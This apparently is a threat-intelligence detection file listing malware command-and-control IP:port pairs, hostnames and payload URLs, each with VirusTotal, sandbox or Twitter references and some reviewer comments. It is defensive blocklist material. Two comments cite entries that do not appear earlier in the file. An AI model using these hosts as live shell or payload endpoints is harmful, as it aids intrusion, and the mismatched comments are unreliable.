# Reference: https://www.virustotal.com/gui/file/86fca38ef2f17c94467cacf4a016c4f1e72d43ca847b99ee04244a4395029892/detection

77.223.232.41:8080

# Reference: https://twitter.com/ScumBots/status/1257468572051353605

sumo.twcug.net

# Reference: https://twitter.com/ScumBots/status/1257510386238177281

162.241.114.106:443

# Reference: https://twitter.com/ScumBots/status/1257510600827121667

3.19.3.150:18415

# Reference: https://app.any.run/tasks/cdb3201c-b063-436f-872a-7527ec118ed9/

41.141.56.139:4444

# Reference: https://twitter.com/ScumBots/status/1258790257610424321

93.26.183.236:4444

# Reference: https://twitter.com/ScumBots/status/1258817981817196544

45.132.73.167:8443
macloud.xyz

# Reference: https://twitter.com/ScumBots/status/1259090833191702529

3.17.202.129:11868

# Reference: https://twitter.com/ScumBots/status/1259699832136052741

3.137.63.131:19019

# Reference: https://twitter.com/ScumBots/status/1260003082605416448

46.21.147.111:443

# Reference: https://twitter.com/ScumBots/status/1260420191453941760

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/aa4c0c3573390beac0d610b51e665dddd3067593b9e3e642b84a84f08362591d/detection

microsoft-support.servehttp.com

# Reference: https://twitter.com/ScumBots/status/1260854950021812224

52.137.10.66:8080
frogoveryoureyes-2.workisboring.com

# Reference: https://twitter.com/ScumBots/status/1261694398456385536

58.186.22.82:3189

# Reference: https://www.virustotal.com/gui/file/5af0920fe7e468368563aed81c3f8bf00124a8480f2cd42cb9f3ab90229cd485/detection
# NOTE(review): bucket-style hostname on a shared object-storage service. Bucket names are
# chosen by the tenant and can be released and later re-created by an unrelated party, so
# this trail should be re-validated periodically. A host/path trail (the form used for the
# divineleverage.org entries in this file) would be more precise if the sample's full URL
# is known.

utils.oss-cn-beijing.aliyuncs.com

# Reference: https://twitter.com/ScumBots/status/1263936676969275393

18.188.14.65:15252

# Reference: https://twitter.com/ScumBots/status/1263935061122039816

3.19.3.150:16128

# Reference: https://www.virustotal.com/gui/file/73f27d0736457997141cde9bbedfa5e7f5a3706282d1999e00f8b1629ee5797a/detection

starpingisd.net

# Reference: https://twitter.com/ScumBots/status/1264926396155154432

3.20.98.123:10343

# Reference: https://twitter.com/ScumBots/status/1265588641168003072

3.19.3.150:10038

# Reference: https://twitter.com/ScumBots/status/1267184160013275137

3.137.63.131:12405

# Reference: https://twitter.com/ScumBots/status/1267184230142029827

3.137.63.131:16051

# Reference: https://twitter.com/ScumBots/status/1270078224119345157

netconnect.online

# Reference: https://twitter.com/ScumBots/status/1270465776164757504

52.47.122.36:443

# Reference: https://twitter.com/ScumBots/status/1270882271625711616

91.241.19.50:441

# Reference: https://www.virustotal.com/gui/file/53f796dbbffb542e42082913b54de4550fafe2e2b0c14194a4ef3ac6ad297089/detection
# Reference: https://app.any.run/tasks/0226a288-c2c5-4ff6-b6fb-cffbd18450f7/

ostrykebs.pl

# Reference: https://twitter.com/malwrhunterteam/status/1271160638342127618

/powersploit-payload

# Reference: https://www.virustotal.com/gui/file/e008999f37b5eacb30d9f8df95a774a92caca1de9d4eb0444f63fe28b85ea9a3/detection

122.178.241.198:4444
topsideduck.ddns.net

# Reference: https://www.virustotal.com/gui/file/6a60f839ad4e0feb6528840ead34f680cb975c13c1e6e4e9a5d132eb24992928/detection

82.137.218.185:4000

# Reference: https://twitter.com/ScumBots/status/1272933338345586690

217.129.59.131:443

# Reference: https://twitter.com/ScumBots/status/1272967268713082881

http://18.231.21.238

# Reference: https://twitter.com/iamwinstonm/status/1273195438619967489

http://185.244.149.202

# Reference: https://twitter.com/ScumBots/status/1273509581734502401

3.13.191.225:10360

# Reference: https://twitter.com/ScumBots/status/1273793952114753537

3.20.98.123:16853

# Reference: https://twitter.com/ScumBots/status/1274873568388620288

3.20.98.123:19779

# Reference: https://twitter.com/ScumBots/status/1274876086254473225

3.21.60.148:17272

# Reference: https://twitter.com/ScumBots/status/1274879860339544064

51.79.158.48:4141

# Reference: https://twitter.com/ScumBots/status/1274951580119371776

3.19.6.32:16555

# Reference: https://twitter.com/ScumBots/status/1274954097775579142

3.21.60.148:19960

# Reference: https://twitter.com/ScumBots/status/1274954166981582850

3.21.60.148:19760

# Reference: https://twitter.com/ScumBots/status/1274959133687656448

3.137.63.131:16057

# Reference: https://twitter.com/ScumBots/status/1275165640148557825

3.13.191.225:28288

# Reference: https://twitter.com/ScumBots/status/1275238473767755776

3.135.90.78:16604

# Reference: https://twitter.com/ScumBots/status/1275515779828584449

3.13.191.225:1337

# Reference: https://twitter.com/ScumBots/status/1275637659482959873

3.17.117.250:1337

# Reference: https://www.virustotal.com/gui/file/2ff79bdaf50e36f7f2f37506ce0ad1e9fafc4d8d40073cedcf050ddb7ce87539/detection

91.241.19.50:27119

# Reference: https://www.virustotal.com/gui/file/7f9390b993605ce2f1097533422e8d6bc43ca2e5d878dd44fdcd6e456f027d71/detection

91.241.19.50:443

# Reference: https://twitter.com/ScumBots/status/1276310538809675777

bot.ruptur88.cf

# Reference: https://twitter.com/ScumBots/status/1276277332752437248

148.101.44.115:3306

# Reference: https://twitter.com/ScumBots/status/1276265872366149633

3.18.75.105:15008

# Reference: https://twitter.com/pmelson/status/1276531571231789058

5.199.174.204:9443

# Reference: https://twitter.com/ScumBots/status/1276773591649042433

195.206.105.52:5389

# Reference: https://app.any.run/tasks/1337bdde-7564-493f-b5a1-57fdbec6cc5c/

http://45.129.96.110

# Reference: https://twitter.com/ScumBots/status/1278940366658568192

3.17.117.250:16240

# Reference: https://twitter.com/ScumBots/status/1278963016621580288

139.155.2.101:8081

# Reference: https://twitter.com/ScumBots/status/1278767101864542208

52.151.2.106:8888

# Reference: https://twitter.com/ScumBots/status/1278600633394880512

23.105.221.34:4443

# Reference: https://twitter.com/ScumBots/status/1280229759843172353

loljumbo.serveousercontent.com

# Reference: https://twitter.com/ScumBots/status/1281078730627198976

94.156.189.220:6522

# Reference: https://www.virustotal.com/gui/file/0503b17fb6673ab7adf3c53405f8d9bca2a1666f890f01e7fc170eec64264e94/detection

3.19.6.32:11642

# Reference: https://twitter.com/ScumBots/status/1281279531559649287
# Reference: https://www.virustotal.com/gui/ip-address/206.189.151.95/detection
# Reference: https://www.virustotal.com/gui/domain/webupdate.live/relations
# NOTE(review): netconnect.online is already listed earlier in this file under a separate
# ScumBots reference; keep a single trail and list all references above it.

netconnect.online
upserver.ml
webupdate.live

# Reference: https://twitter.com/ScumBots/status/1281678408863420417

94.156.189.220:6530

# Reference: https://twitter.com/ScumBots/status/1282010599027814400

185.244.213.8:443

# Reference: https://twitter.com/ScumBots/status/1282614578258550784

3.18.75.105:16334

# Reference: https://twitter.com/ScumBots/status/1282783188620845057

94.156.189.220:1959

# Reference: https://twitter.com/ScumBots/status/1283213525645754369

3.20.98.123:10593

# Reference: https://twitter.com/ScumBots/status/1283548228315750401

193.161.193.99:52614

# Reference: https://twitter.com/ScumBots/status/1284099360813391872

77.255.61.191:4444

# Reference: https://www.virustotal.com/gui/file/c67706504a82f8ffb08ad9a011b987c56748a2edeeeaf7b350e152a7c412352a/detection

172.94.59.115:4444

# Reference: https://www.virustotal.com/gui/file/25801b86c6d2f41ea26db2b6508568ac95e0c568cd7f54af74676181e2564a30/detection

104.244.78.10:443

# Reference: https://www.virustotal.com/gui/file/cb0a57a9de876adec68084482dd819110c38e3a7ea30c2ff9bffa7eb2275280b/detection

versageshops.best

# Reference: https://www.virustotal.com/gui/file/45116c476093055ac6bb414c6270b76f2988e0af05ee3eb3943a5eb36271a0d7/detection

122.171.58.94:8885

# Reference: https://twitter.com/JAMESWT_MHT/status/1287660192579162112
# Reference: https://app.any.run/tasks/1cb4244e-4887-429c-a1a3-447ff6464994/

64.188.22.106:443
office-update.net

# Reference: https://twitter.com/ScumBots/status/1287763508952739844

34.90.230.177:443

# Reference: https://www.virustotal.com/gui/file/225f7d3a59452bab7b07882f4b09643d6f0c32d8efdb89a7602f5dc0070c0c32/detection

94.140.114.160:61262

# Reference: https://www.virustotal.com/gui/file/b4d465a5d1f9a9b57ac91eff7b2e622f6d596617b62797d14efbd721d3b5dc74/detection

195.54.160.115:8018

# Reference: https://twitter.com/InQuest/status/1289636542621908992
# Reference: https://www.virustotal.com/gui/domain/divineleverage.org/relations

divineleverage.org/12.msi
divineleverage.org/4.php
divineleverage.org/6.msi
divineleverage.org/de.php

# Reference: https://www.virustotal.com/gui/file/cbc445b76e9b4364088442abb6f4af3ca70b242e462f66a974dbfebce94b6a81/detection

3.17.117.250:443

# Reference: https://www.virustotal.com/gui/file/a3585d049877144fec5ba1fcaba028ecedb05ab46a174d6ef5105351e5a66579/detection

supercombinating.com

# Reference: https://www.virustotal.com/gui/file/f8276187bbb6dc1523b2f7619b3905466cacb6a58e5d335257fd29e9b0dd8253/detection

213.87.133.142:443

# Reference: https://www.virustotal.com/gui/file/21c5b859c59ef1997f0135552d068d41646fa478bbde43302ccbcf9d8e432aeb/detection

193.34.166.103:443

# Reference: https://www.virustotal.com/gui/file/9c676f263a4eaf2057f657cbd63af106b3d22dda5ed37c55152e4dc9f6ea6769/detection

142.93.56.217:2905

# Reference: https://www.virustotal.com/gui/file/6db020f21e1544eca23093995b6eae7e8b031b65bfe2eca9f4d8dc73b30c7b79/detection

142.93.56.217:4443

# Reference: https://twitter.com/sysopfb/status/1288160992124444672
# Reference: https://www.virustotal.com/gui/ip-address/106.53.232.176/relations
# Reference: https://www.virustotal.com/gui/file/c5eee3c38b0ce6c869cd46ade783ab5ef09a30f08d7f8ddf8870de2d04068e74/detection

106.53.232.176:443
bobohacker.oss-cn-shenzhen.aliyuncs.com

# Reference: https://www.virustotal.com/gui/file/9e7885743e15912ab7284edfe9ef1113d7fc65568a12e1b96ac010598afa9fde/detection

49.235.144.34:4433

# Reference: https://www.virustotal.com/gui/file/d09e55ea3fbae604c29e6ef25247a3273c66044218a6a28fa79abcaa84f10be0/detection

49.235.144.34:8899

# Reference: https://www.virustotal.com/gui/file/e4ea5efc8a9511bb51d35f25a76e35ff941877252a4d3f043f3547c63d176ddf/detection

91.232.105.248:1337

# Reference: https://www.virustotal.com/gui/file/7150ef5a8c8381c68e7e305fb5b370a34bfcfa144aa8c138f04cc9e39080daf9/detection

18.222.239.205:7000

# Reference: https://www.virustotal.com/gui/file/c6ed0ba7acc1ba9ebc7de487f92d8232528be6b0dd7765bf35e0c4161a386d97/detection

206.189.70.79:9876

# Reference: https://www.virustotal.com/gui/file/bd914aba1523c1bec3c5bc7d4918f7163ac6e4f7b7778b383ac934a0644061e6/detection

81.184.61.235:2121

# Reference: https://www.virustotal.com/gui/file/ef70ffeb0ca757c688f8d3f0d5cb2a712b29778ec2c04e1b78f6fd4d31a84bb3/detection

67.43.224.135:443

# Reference: https://www.virustotal.com/gui/file/c6ed0ba7acc1ba9ebc7de487f92d8232528be6b0dd7765bf35e0c4161a386d97/detection
# NOTE(review): this reference and the trail below already appear a few groups earlier in
# this file; the repeat adds no coverage and can be dropped.

206.189.70.79:9876

# Reference: https://www.virustotal.com/gui/file/71fcfac0eb853bfd9be99ff5ecc2c127bfc78c4248097fd705f8f5a5ade426fb/detection

52.14.61.47:17239

# Reference: https://www.virustotal.com/gui/file/fbfbf239d27dc218c156510a471fd72b83f04aef36deea1c05ff7f7646953f20/detection

185.212.227.247:1333

# Reference: https://www.virustotal.com/gui/file/108b68986924bf60cc39da01a2f140aa6ddeec056df099cf4a73abfbcdc08930/detection
# NOTE(review): 137.224.106.4:73 is already listed earlier in this file under a ScumBots
# reference; keep one trail and list both references above it.

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/90e0ce066f5ad7b902a24872aaaf4769996753ce5ee1b407e5db432fd4c471a2/detection

191.242.111.2:1515

# Reference: https://www.virustotal.com/gui/file/bdf90a891969cd8ed146efd7ac19a9b9cd976eb4dbbaf90c6c08a387acfb5e0b/detection

172.105.28.98:1443

# Reference: https://www.virustotal.com/gui/file/d1fe07320067c3ab75a7ca30741116974880c885437760eecaff8623a21baa56/detection

360lab.ddns.net

# Reference: https://www.virustotal.com/gui/file/4bcab93f768c19811b4fd1069f791c10b16b4a9e126faccfe2f3f2b3256d12e5/detection

49.235.23.236:9999

# Reference: https://www.virustotal.com/gui/file/d7542afc77f35b98bba90a89c38fab550ec536a3fb57fe24d362fa301ebc3ac2/detection

62.171.159.243:3333

# Reference: https://www.virustotal.com/gui/file/44e50b2c62d637e3247c79e88f7af40c4f0bb77eb91c91a83dfa80e95720548f/detection

45.76.209.19:443

# Reference: https://www.virustotal.com/gui/file/ec59dc742452c5fe33489183f03bdd40ecc179642f0c393d16e327d61cae94ba/detection

45.76.209.19:4444

# Reference: https://www.virustotal.com/gui/file/14ffe076ac8cdb3d6f780adf09d743299e9ebec5699b533f64920ef5b7596184/detection

google34.theworkpc.com

# Reference: https://www.virustotal.com/gui/file/f5e69036674045c33682c568993d0c1f287640c85d85deaed7d607fdf72f5666/detection
# NOTE(review): rostelekom.pw is already listed earlier in this file; only the address:port
# entry is new in this group.

5.34.180.171:456
rostelekom.pw

# Reference: https://www.virustotal.com/gui/file/3f3a5568991c970cbf9378bd29f86413c39202091aa9d58fa5b67213576c5774/detection

79.134.225.46:2309

# Reference: https://www.virustotal.com/gui/file/be63a303af673f5c03b02107af3a7ac1bac102c3b75f8a11b8e04256a58ab327/detection

52.15.194.28:19286

# Reference: https://www.virustotal.com/gui/file/ead07ee3695925a1b79eafe57bfb023a54254848e68031afa7459f87d14361ec/detection

185.82.217.66:8787

# Reference: https://twitter.com/ScumBots/status/1299191823106215937
# Reference: https://www.virustotal.com/gui/file/189a21b97949a56e32797c3ce37db2624551190073e61194d98736e843e6977f/detection

aigoodojoqu5oopae3ee.sitestill.space
goosh5wie8oa1oov2viw.sitestill.fun

# Reference: https://www.virustotal.com/gui/file/a768b19d3fd1c0f043cc24119c366efdd0e4a0a8483dd9759d2a6a568de6d2ae/detection

185.205.210.179:4321

# Reference: https://www.virustotal.com/gui/file/9f749f0c696c948a80ff3cbea061f0326990925ae32aecc905fe95533518d604/detection

185.205.210.179:6341

# Reference: https://www.virustotal.com/gui/file/22bb3e8141a415f83bca4e2dd8b4bf6413a47e4ee5e38131c4c5b8349f21ee0b/detection

92.42.14.133:443

# Reference: https://www.virustotal.com/gui/file/b301db6b72a2196f99e3da577bd47b724af5d219c192ac2ed921179c0b015592/detection

3.19.6.32:443

# Reference: https://www.virustotal.com/gui/file/4ea106c4e2f1b9a56c00ce01b9a1c941e2f9fdb8df9ff6e91fad93ea81eddcc2/detection

3.21.60.148:14067

# Reference: https://www.virustotal.com/gui/file/c380f48e3d649b6a44b05134108a8c79536f289240e9ed9135e35dadffb6c350/detection

47.99.211.221:8011

# Reference: https://twitter.com/ScumBots/status/1302012841059287043
# Reference: https://www.virustotal.com/gui/file/ba00ffb4b8242f1ad034374a374cf2a9c693cf26b2ba0aa14d1c499e94f4a698/detection

76.21.118.155:4444

# Reference: https://www.virustotal.com/gui/file/f69b1d7998fb00503dea99fa02e19fd61fd1cac2dc84226b86e9d321a51563da/detection

193.109.85.11:8080

# Reference: https://www.virustotal.com/gui/file/6fdc5cc3cbc299f8473d365c87a2fc74813835e7cd4a56ea8b463a9b897936d3/detection

3.239.85.50:8

# Reference: https://www.virustotal.com/gui/file/9f3014f373a5ef6939b7553b770932e57d3dd56225162e4a7134824dd290a37f/detection

3.131.123.134:17759

# Reference: https://www.virustotal.com/gui/file/bb2beae5059a34febd4e88b9cec4167c90d75809debe57848638f26847d7c07f/detection

192.243.108.143:8080

# Reference: https://www.virustotal.com/gui/file/77c48346e04d756712f68db858f7a4e9fcc54bb7681560e9769f741fa55795d8/detection
# NOTE(review): unlike the other hostnames nearby, this one is mixed-case. DNS names are
# case-insensitive, so unless the trail loader normalises case this entry may never match
# observed (lowercase) lookups — confirm, and lowercase the entry if needed.

Rezureax123333-50626.portmap.io

# Reference: https://www.virustotal.com/gui/file/05d75b372218a5c28b3c47f591f969a59714a5fadbc4b9bd4d18611c76920c66/detection

185.150.117.78:443

# Reference: https://www.virustotal.com/gui/file/fb49d3c2488b86be9ea13014a95b87b4e08582511bea1432e100c1d31e39175c/detection

35.182.213.89:443

# Reference: https://www.virustotal.com/gui/file/674be83562be595dbdf31801b9b0f141cef5ef52e23a982a011c175607ae5342/detection

3.134.125.175:17186

# Reference: https://www.virustotal.com/gui/file/79e27ceee57607cbc60ffbc772f01a654b40cd5491553c3cb544d06c3f0f7941/detection

3.130.209.29:13544

# Reference: https://www.virustotal.com/gui/file/102e9f1bffbed86cbbdd383c24c0f4339ab33fc2da0d3cc935237ce127a5e123/detection

38.132.99.165:443

# Reference: https://www.virustotal.com/gui/file/f83e23d630554a3b6db9378964a0a7161ef354cd41d39566b595c86b83a79dcb/detection

45.227.255.171:443

# Reference: https://www.virustotal.com/gui/file/b87336d536c68362ac710bc6ab411965747ec2cd60036292d8ab5f469183acb7/detection

172.241.29.12:443

# Reference: https://www.virustotal.com/gui/file/8db15f541e5b5de82eb55c2fb1720c399d2660a6739255bf1a03763a24fb7586/detection

148.72.176.8:1312
windown-network.myq-see.com

# Reference: https://www.virustotal.com/gui/file/2d631a0a33e915ac3e401d563928a4a7e6d521a8a6be201842b136a86651c846/detection

15.188.8.184:4444

# Reference: https://www.virustotal.com/gui/file/996193e0dcfb60760d7c92527ddec506a8935ad4b42e7fa5ae43bf9e92fe6c4a/detection

71.142.245.190:4444

# Reference: https://www.virustotal.com/gui/file/353f5ffbc3a9c6da2b6d12e3cd1ae99f87e49437375ed2774bcecf9c1515746d/detection

84.238.38.219:1024

# Reference: https://www.virustotal.com/gui/file/f35286de33f3de43806610d65219afb60338e8efb7fa1cb8de5620ddc71bf478/detection

45.227.255.189:443

# Reference: https://www.virustotal.com/gui/file/dae5abc6158c84e826975c7cad786bef9ed4e8c21920ede7d4a71ff6d7d84ab2/detection

104.225.157.144:9000

# Reference: https://www.virustotal.com/gui/file/7459887fba5dea90da46008690a5fee008597a901d7d32754139a2045dced180/detection

92.38.152.45:80

# Reference: https://www.virustotal.com/gui/file/81c87fa0c8cb5d844791509523cd00e98fee1657293c2c62e2e0f73efafe8937/detection

193.161.193.99:59494

# Reference: https://www.virustotal.com/gui/file/817dc0cc93600e2dd0fd49a78f1ddfad61da80a590774841dc15236d82f223fa/detection

160.119.79.88:443

# Reference: https://www.virustotal.com/gui/file/467bfaa6e5d3d29684c964dad40fca99e85dcdeef7ebb2580010d9e61e5b4e7d/detection

39.105.179.187:4400

# Reference: https://www.virustotal.com/gui/file/f55c4c8016756c63c772524c51961821157a07b4febc196cf7a635e36f74b7da/detection

141.105.66.240:8441
h0pe1759.ddns.net

# Reference: https://www.virustotal.com/gui/file/e19485415d49798547753a9fab67bd6a7c0ab0a234b4366f65dd85621838c4c8/detection

1.202.156.1:39999

# Reference: https://www.virustotal.com/gui/file/4067b40f3381b90f611399555f2cac36cd571dcb42fcca91be906489f0c29bf1/detection

http://45.146.165.219

# Reference: https://www.virustotal.com/gui/file/8f0215a8677cc41794519ca18fcc4ea00b9f9080962508d3d7a8f6a7f3d7992f/detection

http://91.241.19.21

# Reference: https://www.virustotal.com/gui/file/3c68ccfd70614ba27c88a1300d3a3401719e2282ead93c1f2f9a02a296e6654a/detection

52.14.18.129:11429

# Reference: https://www.virustotal.com/gui/file/8915f63fdecfcc72e43af78bf188f390ca485ed8f05e34481eee7334c48682b9/detection

199.195.253.79:4242

# Reference: https://www.virustotal.com/gui/file/d8b8be152f7587e115e3e083814837031cb97af56b576e479e1e4fb0ad46323a/detection

193.161.193.99:22898

# Reference: https://www.virustotal.com/gui/file/0b8c09c5a62155c82d499601b3725574fec04b077ee0d9972de330f53e007c64/detection

ns.vvwvv.tk

# Reference: https://www.virustotal.com/gui/file/967a6a41410fd7c6a9aefb86dbe31a184a2b27357e8d19e4a807e227ba9029eb/detection

156.209.144.96:4455

# Reference: https://www.virustotal.com/gui/file/6772f63826584c7cccf747b80735bdc8d76bf4fd76369a5af3d9d67443befbb8/detection

156.209.206.200:4455

# Reference: https://www.virustotal.com/gui/file/94838b74b218eef0bab19cb5cd58cda81ced3006382be914ceeb4b52c861e96b/detection

115.159.119.89:80

# Reference: https://www.virustotal.com/gui/file/ffa2e985e7598a092b2d61a66269965c162d5286c7f4b630ffbe7ac640a2f598/detection

109.59.118.171:4444

# Reference: https://www.virustotal.com/gui/file/6e79a451bfdc2c16b72e44c537de4efcb54d355f53d0054a11652e5c800fd2fa/detection

106.10.106.0:443

# Reference: https://twitter.com/pmelson/status/1336835181387374599
# Reference: https://www.virustotal.com/gui/file/411a3098347a34cc46f681cd855b152386da064d625e0f418de92a7cdcf7b94c/detection

47.111.13.98:80

# Reference: https://www.virustotal.com/gui/file/971adad65b31ac9ca6ea3c3a5085ce2bc1f27004250bf18e87da2bd6dfea090b/detection

193.161.193.99:4884

# Reference: https://www.virustotal.com/gui/file/5684fa5e0b0aad1e253dca7cc71b6d5092731d29887a22d65546d84d170dc5e7/detection

193.161.193.99:36555

# Reference: https://www.virustotal.com/gui/file/f5b943d0135ca0030092231df4a90c4011a878467c16b6f08e21892af1195475/detection
# NOTE(review): 104.28.10.8 appears to fall in a CDN reverse-proxy range (Cloudflare) —
# confirm. If so, the address fronts many unrelated sites and alerts on it will be noisy;
# the hostname contacted by the sample would be the more precise trail.

104.28.10.8:2052

# Reference: https://www.virustotal.com/gui/file/369c7f4ef0ca549b6d3ed4b11c9d069836414300f5903c19091072ceba8a3062/detection

3.89.39.190:4141

# Reference: https://www.virustotal.com/gui/file/7c35885540eacc15930b1f9cdd2541d69a299d0dc89bd7e5764213986916a908/detection

3.131.147.49:19910

# Reference: https://twitter.com/James_inthe_box/status/1338971736016969728

3.133.107.218:3131

# Reference: https://www.virustotal.com/gui/file/d64454bde412b0a7f7f1b9fa413a39ae0e6cf1f8a42ee120d757eaabf8c22033/detection

192.16.0.12:4444

# Reference: https://www.virustotal.com/gui/file/6ef17302c43f67aa1b2c30d86d5b13e592a1abd5b5aa2cef9f21e5ed0f35cec1/detection

124.187.65.208:6606

# Reference: https://www.virustotal.com/gui/file/c2e6f2496ab549c258a1d004fb0c5548413c81f5a556611c369d93a75e3835be/detection

185.205.209.3:443

# Reference: https://www.virustotal.com/gui/file/2b18ab922508b1702b7e6735d16cd3df3260da225ed7436507b329f6f23b43c8/detection

106.75.81.232:12345

# Reference: https://www.virustotal.com/gui/file/aeabd843be9c686bb4db7d720329862c1a6b3c428424f6aec3f6d119c6a70675/detection

5.167.22.68:8080

# Reference: https://www.virustotal.com/gui/file/c24f81c9d092c6c54f2909d6510cab0c0ea0cb6da78f90118bc3f623d5b09e93/detection

47.115.171.255:443

# Reference: https://www.virustotal.com/gui/file/83165474a39af396fbf927271d4f98c9d9567d696723c84ca4ceefbdedc51a72/detection

3.138.45.170:10730

# Reference: https://www.virustotal.com/gui/file/c06ceb893ead5ecb10aaed10c1f7ad8663981130f0fde5a8cbb86cc94200afe4/detection

151.0.0.54:4444

# Reference: https://twitter.com/ScumBots/status/1362431659728060421
# Reference: https://twitter.com/pmelson/status/1362432245152190465
# Reference: https://www.virustotal.com/gui/file/be6d55780cf2ec71310936d3ea31e8efb3d2ff0c21e1ce7d934a673b2d235655/detection

pterobot.net
scret1.ga

# Reference: https://www.virustotal.com/gui/file/d6a9d915eabf42f467fc6639717876cde95897ff42ffb20006ba9feb2f473c3a/detection

3.138.180.119:14119

# Reference: https://twitter.com/jhencinski/status/1367141043695742977
# Reference: https://www.virustotal.com/gui/file/ca9a59ec3f8f6c68b2faad832a163477f2a54870895ce81754ae9496739cb0a5/detection

http://86.105.18.116
86.105.18.116:8080

# Reference: https://www.virustotal.com/gui/file/70b8acf083e052ead5bfc43510d8b0c8f3d0a2d7111050cae5527e89e979e138/detection

18.207.38.244:9002

# Reference: https://www.virustotal.com/gui/file/38e4d4e5436fc2dc31cf37d13670b72a5a8f4319e36cc70436064eaa8a3aa219/detection

18.207.38.244:4444

# Reference: https://www.virustotal.com/gui/file/fb80cc96d1da0bb7f840dde51a602868d6c7b094560f034a204a417250e29cbb/detection

18.207.38.244:7878

# Reference: https://www.virustotal.com/gui/file/19ecc6e0e711913c85d0a0642972ca3a384084681b6cb9894a892669efce54e5/detection

45.33.100.49:4444

# Reference: https://www.virustotal.com/gui/file/45404167e89a4e85efb1b916509bc33e1d28347597051926fd18bbc33a1e350a/detection

185.153.199.102:19999

# Reference: https://www.virustotal.com/gui/file/26b52f93f1e317e82c10b4080a1b1ea257f73f34806722b8fa28d7ace6801eff/detection

45.33.100.49:443

# Reference: https://twitter.com/r3dbU7z/status/1371989287034585089

frostycitadel.xyz

# Reference: https://www.virustotal.com/gui/file/d06b6e85af0ab7ec12f7d5fba3a5ed87093a054a8c355fe4b908f51259e3f89a/detection

3.128.107.74:15257

# Reference: https://www.virustotal.com/gui/file/c1f6e9066d6253223b7a6b1f88992a05a79e54455125d1def4f9dc9e1f4e3c64/detection

3.138.180.119:15001

# Reference: https://www.virustotal.com/gui/file/b698123b562ed9646fe16d2d353191d8c79473b68c9d92de58a181f37b3c305e/detection

3.142.167.54:10274

# Reference: https://www.virustotal.com/gui/file/9ac9f3790d575e1afe3203ab45681b3e4e2d024dad4cba74825f05b3a8efabc6/detection

3.141.210.37:14956

# Reference: https://www.virustotal.com/gui/file/44a1ebcf5f3b564d8ba1b94b7f7bdd7dc731e098f98df602706848bfebe1a589/detection

8.9.6.228:4444

# Reference: https://www.virustotal.com/gui/file/08b08f269beab5f6bfcc046fbc3b2ba1d9df85b7d162ca0d4227390eac70aef8/detection

100.15.133.91:6002

# Reference: https://twitter.com/TheDFIRReport/status/1382313940533796865
# Reference: https://beta.shodan.io/host/136.244.100.210

136.244.100.210:22
136.244.100.210:443

# Reference: https://www.virustotal.com/gui/file/bf256c96ad1bebc4bd595ce59168c27beac3806a674243c4c90f9e08c1a11fec/detection

104.46.95.54:443

# Reference: https://www.virustotal.com/gui/file/98917a9aad6dc80c2ddd23f69ec8064c7e9940a6d9d095cad87a9257ea17925b/detection

75.141.150.74:1337

# Reference: https://www.virustotal.com/gui/file/289f2a019cad83a3014c7d25385f46b80a2bac195744c13129ef0aec3db7fe66/detection

103.146.74.4:2811

# Reference: https://www.virustotal.com/gui/file/972d78154aa35a9ac3c6d5f0cfbf70d3f2123239cb15ef04bd17c390b9d7186e/detection

141.255.152.226:2811

# Reference: https://www.virustotal.com/gui/file/ea01c860df4cb1f77eec64988ed6c24b076e86248c29443d5f2aed65974fe9f1/detection

141.255.157.246:1447

# Reference: https://www.virustotal.com/gui/file/63cc5e3a7fb07e88666fb8c2628971292e92801554ebad66b5e496aebca5124e/detection

182.2.164.147:1337

# Reference: https://www.virustotal.com/gui/file/eb8e24fb8118faf4b657686cae0f3dc367999e8632eef16104f69d84d6f241e2/detection
# NOTE(review): one sample, one port, 27 addresses. This looks like the resolution history
# of a shared TCP-tunnel hostname (compare 0.tcp.ngrok.io listed earlier in this file) —
# confirm. Address:port pairs on such services are reassigned between tenants, so these
# trails age quickly and should carry a review/expiry date. The same pattern recurs in
# later groups of this file (ports 17109, 17525, 14020).

18.188.14.65:15739
18.216.53.253:15739
18.223.41.243:15739
18.224.144.66:15739
198.58.98.92:15739
3.13.191.225:15739
3.134.125.175:15739
3.134.196.116:15739
3.134.39.220:15739
3.135.90.78:15739
3.137.63.131:15739
3.14.182.203:15739
3.14.212.173:15739
3.17.117.250:15739
3.17.202.129:15739
3.17.7.232:15739
3.19.114.185:15739
3.19.3.150:15739
3.20.98.123:15739
3.22.30.40:15739
45.79.7.70:15739
45.79.9.205:15739
52.14.61.47:15739
52.15.183.149:15739
52.15.194.28:15739
52.15.62.13:15739
52.15.72.79:15739

# Reference: https://www.virustotal.com/gui/file/e2be06a6a516709ef11b6d2a3bab1cabb97cc38304b5bbd9450c140bb4db644a/detection

95.211.239.205:555
windows-srv.16-b.it

# Reference: https://twitter.com/TheDFIRReport/status/1387455318569988105
# Reference: https://beta.shodan.io/host/47.111.239.107

http://47.111.239.107
47.111.239.107:9443

# Reference: https://www.virustotal.com/gui/file/c08b712cae78d20d2f0f143a320098e722ffe6070b56b010f09c49edfb7c05ac/detection

159.203.228.45:443

# Reference: https://www.virustotal.com/gui/file/1cd6c84e68002428d5f593e38a37a8b96b73918633287b7d1c4c71b2eb9338f2/detection

13.58.157.220:17109
3.142.129.56:17109
3.142.167.4:17109
3.142.167.54:17109
3.142.81.166:17109
3.19.130.43:17109

# Reference: https://www.inde.nz/blog/different-kind-of-zoombomb
# Reference: https://tria.ge/210325-j85q1nwljj
# Reference: https://www.virustotal.com/gui/file/f547410bd2f0b667b640e350d7c8c55cd4c2f7249e534c02c63d824c87ee2454/detection

http://139.60.161.60
http://45.146.164.111

# Reference: https://www.virustotal.com/gui/file/47e22ff3a144d35cf9839c719009c65618dc3bdf027d151170a5c9882830fbc4/detection

151.80.70.31:4444

# Reference: https://twitter.com/TheDFIRReport/status/1392089649984774146
# Reference: https://beta.shodan.io/host/20.47.114.17

http://20.47.114.17
20.47.114.17:443

# Reference: https://www.virustotal.com/gui/file/16cdf36f2594d6980ef823f1f0405ffb6efaecf143ce790ea16cdf832858816e/detection

195.154.170.195:5555

# Reference: https://www.virustotal.com/gui/file/18539194e29621d4d23a1071b5ada043a71f59085d22c99193d1434e782810ab/detection

146.0.128.54:59498

# Reference: https://twitter.com/TheDFIRReport/status/1394257640851640323
# Reference: https://beta.shodan.io/host/46.101.235.245

46.101.235.245:443

# Reference: https://www.virustotal.com/gui/file/50e825a3a61e6f5fab0740c7ced94ac994d954b95df998fb06f6c11833863006/detection

3.136.65.236:10456

# Reference: https://www.virustotal.com/gui/file/6ce2400e5b6b0ee6feb5d868d89ced79c828b6bba5d837306e44a42f9bb2b952/detection

173.230.145.224:4444

